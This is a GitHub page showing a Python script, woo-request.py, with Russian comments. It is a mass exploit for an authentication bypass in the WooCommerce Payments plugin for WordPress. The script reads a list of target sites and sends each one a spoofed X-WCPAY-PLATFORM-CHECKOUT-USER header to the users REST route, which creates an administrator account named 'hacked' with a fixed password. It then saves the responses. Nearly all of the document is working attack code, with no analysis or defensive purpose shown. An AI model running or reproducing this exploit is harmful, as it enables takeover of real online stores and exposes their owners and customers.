-
Notifications
You must be signed in to change notification settings - Fork 0
/
woo-request.py
64 lines (53 loc) · 2.25 KB
/
woo-request.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
import requests
# struct libs
import asyncio
import aiohttp
def delete_symbols(string):
return string.translate({ord(i): None for i in '/'})
# Функция для проверки уязвимости # потом дописать проверку на плагины а пока что только 200 статус сервера
async def check_vulnerability(target):
try:
if requests.get(target).status_code == 200: return True
# return nm.scan(target)
except:
print(f"[!] target: syntax not supported or server not exist")
# Функция для эксплуатации уязвимости
async def exploit_vulnerability(target):
async with aiohttp.ClientSession(trust_env=True) as session:
url = f'{target}?rest_route=/wp/v2/users' #wp-json doesnt work bypass ?rest_route=
headers = {
'Content-Type': 'application/json',
'X-WCPAY-PLATFORM-CHECKOUT-USER': '1'
}
data = {
"username": "hacked",
"email":"asdf@hfdsa.com",
"password":"h3ll0w0rld",
"roles": ["administrator"]
}
async with session.post(url, json=data, headers=headers) as response:
response_text = await response.text()
print(f"[[32m{url}[0m ]:{response.status}")
if response.status != 404:
print(f"[32m[{url}[0m ]:\n{response_text}")
return (f"STATUS: \n{response.status}\nRESPONSE :\n{response_text}")
# Функция для сохранения результатов в файл
def save_results(filename, results):
with open(filename, 'w') as f:
f.write(results)
# Чтение целей из файла
with open('targets.txt', 'r') as file:
targets = file.readlines()
async def main():
tasks = []
for target in targets:
target = target.strip()
tasks.append(asyncio.create_task(process_target(target)))
await asyncio.gather(*tasks)
async def process_target(target):
if await check_vulnerability(target):
print(f"[32m[+]IP: {target}[0m ")
exploit_result = await exploit_vulnerability(target)
save_results(f"results_{delete_symbols(target)}.txt", exploit_result)
if __name__ == '__main__':
asyncio.run(main())